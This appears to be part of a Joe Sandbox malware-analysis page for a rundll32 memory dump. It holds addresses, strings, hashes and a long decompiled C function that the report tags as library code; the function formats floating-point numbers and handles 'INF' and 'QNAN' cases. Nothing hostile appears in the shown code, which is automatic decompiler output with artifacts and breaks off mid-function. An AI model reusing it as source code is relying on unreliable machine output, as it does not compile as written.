0x0020ed52
0x0020ed0e
0x0020ed14
0x00000000
0x0020ed1a
0x0020ed1a
0x00000000
0x0020ed1a
0x0020ed14
0x0020ed0c
0x00000000
0x0020ed04
0x0020eda3
0x0020edaf
0x0020edb2
0x0020edb4
0x0020edb9
0x0020edb9
0x0020edc6
0x0020edce

Strings

n, xrefs: 0020EA88
)?, xrefs: 0020EC42
9v, xrefs: 0020EBCD
dR, xrefs: 0020EC60
<q7, xrefs: 0020EBC5
--0, xrefs: 0020ED0E
--0, xrefs: 0020EA90
T8T, xrefs: 0020EB51

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: n$)?$9v$<q7$dR$--0$--0$T8T
API String ID: 0-1820671589
Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
Instruction ID: 858ad7256f9fe88bed29131e4b671feba7c8946ed2f357d65f7b91f0acfe96ef
Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
Instruction Fuzzy Hash: 359152714093419BD768CF61C98981FFBF1FBC5B58F404A1DF296862A0C3B68A558F47

Uniqueness

Uniqueness Score: -1.00%

Function 1003628F, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 77%

			E1003628F(void* __ebx, signed int __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				char _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				intOrPtr _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1928;
				char _v1932;
				signed int _v1940;
				signed int _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __ebp;
				signed int _t798;
				intOrPtr _t808;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				intOrPtr _t822;
				intOrPtr* _t823;
				intOrPtr* _t826;
				signed int _t832;
				signed int _t834;
				signed int _t841;
				signed int _t846;
				intOrPtr _t852;
				void* _t853;
				signed int _t859;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t868;
				signed int _t870;
				signed int _t872;
				signed int _t873;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t882;
				signed int _t885;
				signed int _t888;
				signed int _t893;
				signed int _t894;
				signed int _t901;
				signed int _t904;
				signed int _t908;
				char* _t911;
				signed int _t914;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				char* _t929;
				signed char _t931;
				signed int _t936;
				signed int _t938;
				signed int _t942;
				signed int _t945;
				signed int _t952;
				signed int _t955;
				signed int _t957;
				signed int _t960;
				signed int _t967;
				signed int _t968;
				signed int _t971;
				signed int _t984;
				signed int _t985;
				signed int _t986;
				signed int _t987;
				signed int* _t988;
				signed char _t990;
				signed int* _t993;
				signed int _t995;
				signed int _t997;
				signed int _t1001;
				signed int _t1004;
				signed int _t1011;
				signed int _t1014;
				signed int _t1017;
				signed int _t1020;
				signed int _t1027;
				intOrPtr _t1031;
				signed int _t1032;
				signed int _t1038;
				void* _t1045;
				signed int _t1046;
				signed int _t1047;
				signed int _t1048;
				signed int _t1051;
				signed int _t1057;
				signed int _t1061;
				signed int _t1063;
				signed int _t1068;
				void* _t1074;
				signed int _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1080;
				signed int _t1084;
				signed int _t1085;
				signed int _t1089;
				signed int _t1091;
				signed int _t1096;
				signed char _t1103;
				signed int _t1109;
				intOrPtr* _t1116;
				signed int _t1124;
				signed int _t1125;
				signed int _t1130;
				signed int _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1137;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				signed int _t1145;
				signed int _t1146;
				signed int _t1147;
				signed int _t1149;
				signed int _t1150;
				signed int _t1151;
				signed int _t1152;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1158;
				signed int _t1159;
				unsigned int _t1160;
				unsigned int _t1164;
				unsigned int _t1167;
				signed int _t1168;
				signed int _t1171;
				signed int* _t1174;
				signed int _t1177;
				void* _t1179;
				unsigned int _t1180;
				signed int _t1181;
				signed int _t1184;
				signed int* _t1187;
				signed int _t1190;
				signed int _t1193;
				signed int _t1194;
				signed int _t1195;
				signed int _t1196;
				signed int _t1199;
				signed int _t1204;
				signed int _t1205;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1215;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				signed int _t1220;
				signed int _t1221;
				signed int _t1223;
				void* _t1224;
				signed int _t1225;
				signed int _t1227;
				signed int _t1232;
				intOrPtr _t1237;
				signed int _t1238;
				void* _t1243;
				unsigned int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				void* _t1264;
				void* _t1267;
				signed int _t1269;
				signed int _t1273;
				signed int _t1275;
				signed int _t1279;
				signed int _t1281;
				signed int _t1282;
				intOrPtr _t1284;
				intOrPtr _t1285;
				signed int _t1288;
				signed int _t1289;
				signed int _t1291;
				void* _t1294;
				signed int _t1296;
				signed int _t1297;
				signed int _t1299;
				signed int _t1300;
				signed int _t1302;
				signed int _t1309;
				void* _t1311;
				signed int* _t1312;
				signed int* _t1316;
				signed int _t1319;
				signed int _t1328;

				_t1193 = __edx;
				_t798 =  *0x1004d054; // 0x944e5696
				_v8 = _t798 ^ _t1309;
				_v1928 = _a16;
				_v1896 = _a20;
				E1003A2F1(__eflags,  &_v1940);
				_t1103 = 1;
				if((_v1940 & 0x0000001f) != 0x1f) {
					E1003A359(__eflags,  &_v1940);
					_v1932 = 1;
				} else {
					_v1932 = 0;
				}
				_t1281 = _a8;
				_t1237 = 0x20;
				_t1319 = _t1281;
				if(_t1319 > 0 || _t1319 >= 0 && _a4 >= 0) {
					_t808 = _t1237;
				} else {
					_t808 = 0x2d;
				}
				_t1116 = _v1928;
				 *_t1116 = _t808;
				 *((intOrPtr*)(_t1116 + 8)) = _v1896;
				E1003A292( &_v1944, 0, 0);
				_t1312 = _t1311 + 0xc;
				if((_t1281 & 0x7ff00000) != 0) {
					L14:
					_t815 = E1002D1D5( &_a4);
					_pop(_t1119);
					__eflags = _t815;
					if(_t815 != 0) {
						_t1119 = _v1928;
						 *((intOrPtr*)(_v1928 + 4)) = _t1103;
					}
					_t816 = _t815 - 1;
					__eflags = _t816;
					if(_t816 == 0) {
						_t817 = E100120A5(_v1896, _a24, "1#INF");
						__eflags = _t817;
						if(_t817 != 0) {
							goto L311;
						} else {
							_t1103 = 0;
							__eflags = 0;
							goto L308;
						}
					} else {
						_t832 = _t816 - 1;
						__eflags = _t832;
						if(_t832 == 0) {
							_push("1#QNAN");
							goto L12;
						} else {
							_t834 = _t832 - 1;
							__eflags = _t834;
							if(_t834 == 0) {
								_push("1#SNAN");
								goto L12;
							} else {
								__eflags = _t834 == 1;
								if(_t834 == 1) {
									_push("1#IND");
									goto L12;
								} else {
									_v1920 = _v1920 & 0x00000000;
									_a8 = _t1281 & 0x7fffffff;
									_t1328 = _a4;
									asm("fst qword [ebp-0x75c]");
									_t1288 = _v1884;
									_v1916 = _a12 + 1;
									_t1124 = _t1288 >> 0x14;
									_t841 = _t1124 & 0x000007ff;
									__eflags = _t841;
									if(_t841 != 0) {
										_t841 = 0;
										_t1194 = 0x100000;
										_t39 =  &_v1876;
										 *_t39 = _v1876 & 0;
										__eflags =  *_t39;
									} else {
										_t1194 = 0;
										_v1876 = _t1103;
									}
									_t1289 = _t1288 & 0x000fffff;
									_v1912 = _v1888 + _t841;
									asm("adc esi, edx");
									_t1125 = _t1124 & 0x000007ff;
									_v1868 = _v1876 + _t1125;
									E1003A3B0(_t1125, _t1328);
									_push(_t1125);
									_push(_t1125);
									 *_t1312 = _t1328;
									E1003A4C0(_t1125);
									_t846 = E1003FA10(_t1194);
									_v1904 = _t846;
									_t1243 = 0x20;
									__eflags = _t846 - 0x7fffffff;
									if(_t846 == 0x7fffffff) {
										L25:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t846 - 0x80000000;
										if(_t846 == 0x80000000) {
											goto L25;
										}
									}
									_t1195 = _v1868;
									__eflags = _t1289;
									_v468 = _v1912;
									_v464 = _t1289;
									_t1130 = (0 | _t1289 != 0x00000000) + 1;
									_v1892 = _t1130;
									_v472 = _t1130;
									__eflags = _t1195 - 0x433;
									if(_t1195 < 0x433) {
										__eflags = _t1195 - 0x35;
										if(_t1195 == 0x35) {
											L96:
											__eflags = _t1289;
											_t209 =  &_v1884;
											 *_t209 = _v1884 & 0x00000000;
											__eflags =  *_t209;
											_t852 =  *((intOrPtr*)(_t1309 + 4 + (0 | _t1289 != 0x00000000) * 4 - 0x1d4));
											asm("bsr eax, eax");
											if( *_t209 == 0) {
												_t853 = 0;
												__eflags = 0;
											} else {
												_t853 = _t852 + 1;
											}
											__eflags = _t1243 - _t853 - _t1103;
											asm("sbb esi, esi");
											_t1291 =  ~_t1289 + _t1130;
											__eflags = _t1291 - 0x73;
											if(_t1291 <= 0x73) {
												_t1196 = _t1291 - 1;
												__eflags = _t1196 - 0xffffffff;
												if(_t1196 != 0xffffffff) {
													_t222 = _t1196 - 1; // 0x23
													_t1264 = _t222;
													while(1) {
														__eflags = _t1196 - _t1130;
														if(_t1196 >= _t1130) {
															_t1027 = 0;
															__eflags = 0;
														} else {
															_t1027 =  *(_t1309 + _t1196 * 4 - 0x1d0);
														}
														__eflags = _t1264 - _t1130;
														if(_t1264 >= _t1130) {
															_t1160 = 0;
															__eflags = 0;
														} else {
															_t1160 =  *(_t1309 + _t1196 * 4 - 0x1d4);
														}
														 *(_t1309 + _t1196 * 4 - 0x1d0) = _t1160 >> 0x0000001f | _t1027 + _t1027;
														_t1196 = _t1196 - 1;
														_t1264 = _t1264 - 1;
														__eflags = _t1196 - 0xffffffff;
														if(_t1196 == 0xffffffff) {
															goto L111;
														}
														_t1130 = _v472;
													}
												}
												L111:
												_v472 = _t1291;
											} else {
												_v1400 = _v1400 & 0x00000000;
												_v472 = _v472 & 0x00000000;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L312();
												_t1312 =  &(_t1312[4]);
											}
											_t1246 = 0x434 >> 5;
											E100050F0(0x434 >> 5,  &_v1396, 0, 0x434);
											__eflags = 1;
											 *(_t1309 + 0xbad63d) = 1 << (0x00000434 - _v1868 & 0x0000001f);
										} else {
											_v1396 = _v1396 & 0x00000000;
											_v1392 = 0x100000;
											_v1400 = 2;
											__eflags = _t1289;
											if(_t1289 != 0) {
												_t1224 = 0;
												__eflags = 0;
												while(1) {
													_t1031 =  *((intOrPtr*)(_t1309 + _t1224 - 0x570));
													__eflags = _t1031 -  *((intOrPtr*)(_t1309 + _t1224 - 0x1d0));
													if(_t1031 !=  *((intOrPtr*)(_t1309 + _t1224 - 0x1d0))) {
														goto L96;
													}
													_t1224 = _t1224 + 4;
													__eflags = _t1224 - 8;
													if(_t1224 != 8) {
														continue;
													} else {
														__eflags = 0;
														asm("bsr eax, esi");
														_v1884 = 0;
														if(0 == 0) {
															_t1032 = 0;
														} else {
															_t1032 = _t1031 + 1;
														}
														__eflags = _t1243 - _t1032 - 2;
														asm("sbb esi, esi");
														_t1302 =  ~_t1289 + _t1130;
														__eflags = _t1302 - 0x73;
														if(_t1302 <= 0x73) {
															_t1225 = _t1302 - 1;
															__eflags = _t1225 - 0xffffffff;
															if(_t1225 != 0xffffffff) {
																_t191 = _t1225 - 1; // 0x23
																_t1267 = _t191;
																while(1) {
																	__eflags = _t1225 - _t1130;
																	if(_t1225 >= _t1130) {
																		_t1038 = 0;
																	} else {
																		_t1038 =  *(_t1309 + _t1225 * 4 - 0x1d0);
																	}
																	__eflags = _t1267 - _t1130;
																	if(_t1267 >= _t1130) {
																		_t1164 = 0;
																	} else {
																		_t1164 =  *(_t1309 + _t1225 * 4 - 0x1d4);
																	}
																	 *(_t1309 + _t1225 * 4 - 0x1d0) = _t1164 >> 0x0000001e | _t1038 << 0x00000002;
																	_t1225 = _t1225 - 1;
																	_t1267 = _t1267 - 1;
																	__eflags = _t1225 - 0xffffffff;
																	if(_t1225 == 0xffffffff) {
																		goto L94;
																	}
																	_t1130 = _v472;
																}
															}
															L94:
															_v472 = _t1302;
														} else {
															_push(0);
															_v1400 = 0;
															_push( &_v1396);
															_v472 = 0;
															_push(0x1cc);
															_push( &_v468);
															L312();
															_t1312 =  &(_t1312[4]);
														}
														_t1246 = 0x435 >> 5;
														E100050F0(0x435 >> 5,  &_v1396, 0, 0x435);
														 *(_t1309 + 0xbad63d) = 1 << (0x00000435 - _v1868 & 0x0000001f);
													}
													goto L113;
												}
											}
											goto L96;
										}
										L113:
										_t859 = _t1246 + 1;
										_t1294 = 0x1cc;
										_v1400 = _t859;
										_v936 = _t859;
										_push(_t859 << 2);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L312();
										_t1316 =  &(_t1312[7]);
										_t1103 = 1;
										__eflags = 1;
									} else {
										_v1396 = _v1396 & 0x00000000;
										_v1392 = 0x100000;
										_v1400 = 2;
										__eflags = _t1289;
										if(_t1289 == 0) {
											L53:
											_t1167 = _t1195 - 0x432;
											_t1168 = _t1167 & 0x0000001f;
											_v1900 = _t1167 >> 5;
											_v1876 = _t1168;
											_v1920 = _t1243 - _t1168;
											_t1045 = E1003F970(_t1103, _t1243 - _t1168, 0);
											_t1227 = _v1892;
											_t1046 = _t1045 - 1;
											_t128 =  &_v1872;
											 *_t128 = _v1872 & 0x00000000;
											__eflags =  *_t128;
											_v1912 = _t1046;
											_t1047 =  !_t1046;
											_v1884 = _t1047;
											asm("bsr eax, ecx");
											if( *_t128 == 0) {
												_t136 =  &_v1880;
												 *_t136 = _v1880 & 0x00000000;
												__eflags =  *_t136;
											} else {
												_v1880 = _t1047 + 1;
											}
											_t1171 = _v1900;
											_t1294 = 0x1cc;
											_t1048 = _t1227 + _t1171;
											__eflags = _t1048 - 0x73;
											if(_t1048 <= 0x73) {
												__eflags = _t1243 - _v1880 - _v1876;
												asm("sbb eax, eax");
												_t1051 =  ~_t1048 + _t1227 + _t1171;
												_v1908 = _t1051;
												__eflags = _t1051 - 0x73;
												if(_t1051 > 0x73) {
													goto L57;
												} else {
													_t1269 = _t1171 - 1;
													_t1057 = _t1051 - 1;
													_v1872 = _t1269;
													_v1868 = _t1057;
													__eflags = _t1057 - _t1269;
													if(_t1057 != _t1269) {
														_t1273 = _t1057 - _t1171;
														__eflags = _t1273;
														_t1174 =  &(( &_v472)[_t1273]);
														_v1892 = _t1174;
														while(1) {
															__eflags = _t1273 - _t1227;
															if(_t1273 >= _t1227) {
																_t1061 = 0;
																__eflags = 0;
															} else {
																_t1061 = _t1174[1];
															}
															_v1880 = _t1061;
															_t156 = _t1273 - 1; // -4
															__eflags = _t156 - _t1227;
															if(_t156 >= _t1227) {
																_t1063 = 0;
																__eflags = 0;
															} else {
																_t1063 =  *_t1174;
															}
															_t1177 = _v1868;
															 *(_t1309 + _t1177 * 4 - 0x1d0) = (_t1063 & _v1884) >> _v1920 | (_v1880 & _v1912) << _v1876;
															_t1068 = _t1177 - 1;
															_t1174 = _v1892 - 4;
															_v1868 = _t1068;
															_t1273 = _t1273 - 1;
															_v1892 = _t1174;
															__eflags = _t1068 - _v1872;
															if(_t1068 == _v1872) {
																break;
															}
															_t1227 = _v472;
														}
														_t1171 = _v1900;
													}
													__eflags = _t1171;
													if(_t1171 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1171 << 2);
														_t1312 =  &(_t1312[3]);
													}
													_v472 = _v1908;
												}
											} else {
												L57:
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(_t1294);
												_push( &_v468);
												L312();
												_t1312 =  &(_t1312[4]);
											}
											_v1396 = 2;
											_push(4);
										} else {
											_t1179 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1309 + _t1179 - 0x570)) -  *((intOrPtr*)(_t1309 + _t1179 - 0x1d0));
												if( *((intOrPtr*)(_t1309 + _t1179 - 0x570)) !=  *((intOrPtr*)(_t1309 + _t1179 - 0x1d0))) {
													goto L53;
												}
												_t1179 = _t1179 + 4;
												__eflags = _t1179 - 8;
												if(_t1179 != 8) {
													continue;
												} else {
													_t1180 = _t1195 - 0x431;
													_t1181 = _t1180 & 0x0000001f;
													_v1880 = _t1180 >> 5;
													_v1900 = _t1181;
													_v1872 = _t1243 - _t1181;
													_t1074 = E1003F970(_t1103, _t1243 - _t1181, 0);
													_t1232 = _v1892;
													_t1075 = _t1074 - 1;
													_t68 =  &_v1884;
													 *_t68 = _v1884 & 0x00000000;
													__eflags =  *_t68;
													_v1908 = _t1075;
													_t1076 =  !_t1075;
													_v1912 = _t1076;
													asm("bsr eax, ecx");
													if( *_t68 == 0) {
														_t76 =  &_v1876;
														 *_t76 = _v1876 & 0x00000000;
														__eflags =  *_t76;
													} else {
														_v1876 = _t1076 + 1;
													}
													_t1184 = _v1880;
													_t1294 = 0x1cc;
													_t1077 = _t1232 + _t1184;
													__eflags = _t1077 - 0x73;
													if(_t1077 <= 0x73) {
														__eflags = _t1243 - _v1876 - _v1900;
														asm("sbb eax, eax");
														_t1080 =  ~_t1077 + _t1232 + _t1184;
														_v1884 = _t1080;
														__eflags = _t1080 - 0x73;
														if(_t1080 > 0x73) {
															goto L35;
														} else {
															_t1275 = _t1184 - 1;
															_t1085 = _t1080 - 1;
															_v1920 = _t1275;
															_v1868 = _t1085;
															__eflags = _t1085 - _t1275;
															if(_t1085 != _t1275) {
																_t1279 = _t1085 - _t1184;
																__eflags = _t1279;
																_t1187 =  &(( &_v472)[_t1279]);
																_v1892 = _t1187;
																while(1) {
																	__eflags = _t1279 - _t1232;
																	if(_t1279 >= _t1232) {
																		_t1089 = 0;
																		__eflags = 0;
																	} else {
																		_t1089 = _t1187[1];
																	}
																	_v1876 = _t1089;
																	_t96 = _t1279 - 1; // -4
																	__eflags = _t96 - _t1232;
																	if(_t96 >= _t1232) {
																		_t1091 = 0;
																		__eflags = 0;
																	} else {
																		_t1091 =  *_t1187;
																	}
																	_t1190 = _v1868;
																	 *(_t1309 + _t1190 * 4 - 0x1d0) = (_t1091 & _v1912) >> _v1872 | (_v1876 & _v1908) << _v1900;
																	_t1096 = _t1190 - 1;
																	_t1187 = _v1892 - 4;
																	_v1868 = _t1096;
																	_t1279 = _t1279 - 1;
																	_v1892 = _t1187;
																	__eflags = _t1096 - _v1920;
																	if(_t1096 == _v1920) {
																		break;
																	}
																	_t1232 = _v472;
																}
																_t1184 = _v1880;
															}
															__eflags = _t1184;
															if(_t1184 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1184 << 2);
																_t1312 =  &(_t1312[3]);
															}
															_v472 = _v1884;
														}
													} else {
														L35:
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(_t1294);
														_push( &_v468);
														L312();
														_t1312 =  &(_t1312[4]);
													}
													_t1084 = 4;
													_v1396 = _t1084;
													_push(_t1084);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_v1392 = _v1392 & 0x00000000;
										_push( &_v1396);
										_v936 = _t1103;
										_push(_t1294);
										_push( &_v932);
										_v1400 = _t1103;
										L312();
										_t1316 =  &(_t1312[4]);
									}
									_t863 = _v1904;
									_t1132 = 0xa;
									_v1912 = _t1132;
									__eflags = _t863;
									if(_t863 < 0) {
										_t864 =  ~_t863;
										_t865 = _t864 / _t1132;
										_v1892 = _t865;
										_t1133 = _t864 % _t1132;
										_v1920 = _t1133;
										__eflags = _t865;
										if(_t865 == 0) {
											L246:
											__eflags = _t1133;
											if(_t1133 != 0) {
												_t908 =  *(0x100493b4 + _t1133 * 4);
												_v1884 = _t908;
												__eflags = _t908;
												if(_t908 == 0) {
													L258:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L259;
												} else {
													__eflags = _t908 - _t1103;
													if(_t908 != _t1103) {
														_t1143 = _v472;
														__eflags = _t1143;
														if(_t1143 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1252 = 0;
															__eflags = 0;
															do {
																_t1209 = _t908 *  *(_t1309 + _t1252 * 4 - 0x1d0) >> 0x20;
																 *(_t1309 + _t1252 * 4 - 0x1d0) = _t908 *  *(_t1309 + _t1252 * 4 - 0x1d0) + _v1872;
																_t908 = _v1884;
																asm("adc edx, 0x0");
																_t1252 = _t1252 + 1;
																_v1872 = _t1209;
																__eflags = _t1252 - _t1143;
															} while (_t1252 != _t1143);
															__eflags = _t1209;
															if(_t1209 != 0) {
																_t914 = _v472;
																__eflags = _t914 - 0x73;
																if(_t914 >= 0x73) {
																	goto L258;
																} else {
																	 *(_t1309 + _t914 * 4 - 0x1d0) = _t1209;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t865 - 0x26;
												if(_t865 > 0x26) {
													_t865 = 0x26;
												}
												_t1144 =  *(0x1004931e + _t865 * 4) & 0x000000ff;
												_v1900 = _t865;
												_v1400 = ( *(0x1004931e + _t865 * 4) & 0x000000ff) + ( *(0x1004931f + _t865 * 4) & 0x000000ff);
												E100050F0(_t1144 << 2,  &_v1396, 0, _t1144 << 2);
												_t925 = E100045C0( &(( &_v1396)[_t1144]), 0x10048a18 + ( *(0x1004931c + _v1900 * 4) & 0x0000ffff) * 4, ( *(0x1004931f + _t865 * 4) & 0x000000ff) << 2);
												_t1255 = _v1400;
												_t1316 =  &(_t1316[6]);
												__eflags = _t1255 - _t1103;
												if(_t1255 > _t1103) {
													__eflags = _v472 - _t1103;
													if(_v472 > _t1103) {
														__eflags = _t1255 - _v472;
														_t1210 =  &_v1396;
														_t548 = _t1255 - _v472 > 0;
														__eflags = _t548;
														_t926 = _t925 & 0xffffff00 | _t548;
														if(_t548 >= 0) {
															_t1210 =  &_v468;
														}
														_v1876 = _t1210;
														_t1145 =  &_v468;
														__eflags = _t926;
														if(_t926 == 0) {
															_t1145 =  &_v1396;
														}
														_v1872 = _t1145;
														__eflags = _t926;
														if(_t926 == 0) {
															_t1146 = _v472;
															_v1880 = _t1146;
														} else {
															_t1146 = _t1255;
															_v1880 = _t1255;
														}
														__eflags = _t926;
														if(_t926 != 0) {
															_t1255 = _v472;
														}
														_t927 = 0;
														_t1296 = 0;
														_v1864 = 0;
														__eflags = _t1146;
														if(_t1146 == 0) {
															L240:
															_v472 = _t927;
															_t1294 = 0x1cc;
															_t928 = _t927 << 2;
															__eflags = _t928;
															_push(_t928);
															_t929 =  &_v1860;
															goto L241;
														} else {
															do {
																__eflags =  *(_t1210 + _t1296 * 4);
																if( *(_t1210 + _t1296 * 4) != 0) {
																	_t1213 = 0;
																	_t1147 = _t1296;
																	_v1868 = _v1868 & 0;
																	_v1908 = 0;
																	__eflags = _t1255;
																	if(_t1255 == 0) {
																		L237:
																		__eflags = _t1147 - 0x73;
																		if(_t1147 == 0x73) {
																			goto L255;
																		} else {
																			_t1146 = _v1880;
																			_t1210 = _v1876;
																			goto L239;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1147 - 0x73;
																			if(_t1147 == 0x73) {
																				goto L232;
																			}
																			__eflags = _t1147 - _t927;
																			if(_t1147 == _t927) {
																				 *(_t1309 + _t1147 * 4 - 0x740) =  *(_t1309 + _t1147 * 4 - 0x740) & 0x00000000;
																				_t945 = _v1868 + 1 + _t1296;
																				__eflags = _t945;
																				_v1864 = _t945;
																			}
																			_t938 =  *(_v1872 + _v1868 * 4);
																			_t1215 = _v1876;
																			_t1213 = _t938 *  *(_t1215 + _t1296 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1309 + _t1147 * 4 - 0x740) =  *(_t1309 + _t1147 * 4 - 0x740) + _t938 *  *(_t1215 + _t1296 * 4) + _v1908;
																			asm("adc edx, 0x0");
																			_t942 = _v1868 + 1;
																			_t1147 = _t1147 + 1;
																			_v1868 = _t942;
																			__eflags = _t942 - _t1255;
																			_v1908 = _t1213;
																			_t927 = _v1864;
																			if(_t942 != _t1255) {
																				continue;
																			} else {
																				goto L232;
																			}
																			while(1) {
																				L232:
																				__eflags = _t1213;
																				if(_t1213 == 0) {
																					goto L237;
																				}
																				__eflags = _t1147 - 0x73;
																				if(_t1147 == 0x73) {
																					L255:
																					_t1294 = 0x1cc;
																					goto L256;
																				} else {
																					__eflags = _t1147 - _t927;
																					if(_t1147 == _t927) {
																						_t604 = _t1309 + _t1147 * 4 - 0x740;
																						 *_t604 =  *(_t1309 + _t1147 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t604;
																						_t610 = _t1147 + 1; // 0x1
																						_v1864 = _t610;
																					}
																					_t936 = _t1213;
																					_t1213 = 0;
																					 *(_t1309 + _t1147 * 4 - 0x740) =  *(_t1309 + _t1147 * 4 - 0x740) + _t936;
																					_t927 = _v1864;
																					asm("adc edx, edx");
																					_t1147 = _t1147 + 1;
																					continue;
																				}
																				goto L243;
																			}
																			goto L237;
																		}
																		goto L232;
																	}
																} else {
																	__eflags = _t1296 - _t927;
																	if(_t1296 == _t927) {
																		 *(_t1309 + _t1296 * 4 - 0x740) =  *(_t1309 + _t1296 * 4 - 0x740) & 0x00000000;
																		_t567 = _t1296 + 1; // 0x1
																		_t927 = _t567;
																		_v1864 = _t927;
																	}
																	goto L239;
																}
																goto L243;
																L239:
																_t1296 = _t1296 + 1;
																__eflags = _t1296 - _t1146;
															} while (_t1296 != _t1146);
															goto L240;
														}
													} else {
														_t1294 = 0x1cc;
														_v1872 = _v468;
														_push(_t1255 << 2);
														_v472 = _t1255;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L312();
														_t952 = _v1872;
														_t1316 =  &(_t1316[4]);
														__eflags = _t952;
														if(_t952 != 0) {
															__eflags = _t952 - _t1103;
															if(_t952 == _t1103) {
																goto L242;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L242;
																} else {
																	_v1884 = _v472;
																	_t1149 = 0;
																	_t1256 = 0;
																	__eflags = 0;
																	do {
																		_t1211 = _t952 *  *(_t1309 + _t1256 * 4 - 0x1d0) >> 0x20;
																		 *(_t1309 + _t1256 * 4 - 0x1d0) = _t952 *  *(_t1309 + _t1256 * 4 - 0x1d0) + _t1149;
																		_t952 = _v1872;
																		asm("adc edx, 0x0");
																		_t1256 = _t1256 + 1;
																		_t1149 = _t1211;
																		__eflags = _t1256 - _v1884;
																	} while (_t1256 != _v1884);
																	__eflags = _t1149;
																	if(_t1149 == 0) {
																		goto L242;
																	} else {
																		_t955 = _v472;
																		__eflags = _t955 - 0x73;
																		if(_t955 >= 0x73) {
																			L256:
																			_push(0);
																			_v2408 = 0;
																			_v472 = 0;
																			_push( &_v2404);
																			_push(_t1294);
																			_push( &_v468);
																			L312();
																			_t1316 =  &(_t1316[4]);
																			_t931 = 0;
																		} else {
																			 *(_t1309 + _t955 * 4 - 0x1d0) = _t1149;
																			_v472 = _v472 + 1;
																			goto L242;
																		}
																	}
																}
															}
														} else {
															_v2408 = _t952;
															_v472 = _t952;
															_push(_t952);
															_t929 =  &_v2404;
															L241:
															_push(_t929);
															_push(_t1294);
															_push( &_v468);
															L312();
															_t1316 =  &(_t1316[4]);
															L242:
															_t931 = _t1103;
														}
													}
												} else {
													_t1257 = _v1396;
													__eflags = _t1257;
													if(_t1257 != 0) {
														__eflags = _t1257 - _t1103;
														if(_t1257 == _t1103) {
															goto L194;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L194;
															} else {
																_t1150 = 0;
																_v1884 = _v472;
																_t1297 = 0;
																__eflags = 0;
																do {
																	_t957 = _t1257;
																	_t1212 = _t957 *  *(_t1309 + _t1297 * 4 - 0x1d0) >> 0x20;
																	 *(_t1309 + _t1297 * 4 - 0x1d0) = _t957 *  *(_t1309 + _t1297 * 4 - 0x1d0) + _t1150;
																	asm("adc edx, 0x0");
																	_t1297 = _t1297 + 1;
																	_t1150 = _t1212;
																	__eflags = _t1297 - _v1884;
																} while (_t1297 != _v1884);
																__eflags = _t1150;
																if(_t1150 == 0) {
																	goto L194;
																} else {
																	_t960 = _v472;
																	__eflags = _t960 - 0x73;
																	if(_t960 >= 0x73) {
																		_push(0);
																		_v2408 = 0;
																		_v472 = 0;
																		_push( &_v2404);
																		_push(0x1cc);
																		_push( &_v468);
																		L312();
																		_t1316 =  &(_t1316[4]);
																		_t931 = 0;
																		goto L195;
																	} else {
																		 *(_t1309 + _t960 * 4 - 0x1d0) = _t1150;
																		_v472 = _v472 + 1;
																		goto L194;
																	}
																}
															}
														}
														goto L261;
													} else {
														__eflags = 0;
														_push(0);
														_v2408 = 0;
														_v472 = 0;
														_push( &_v2404);
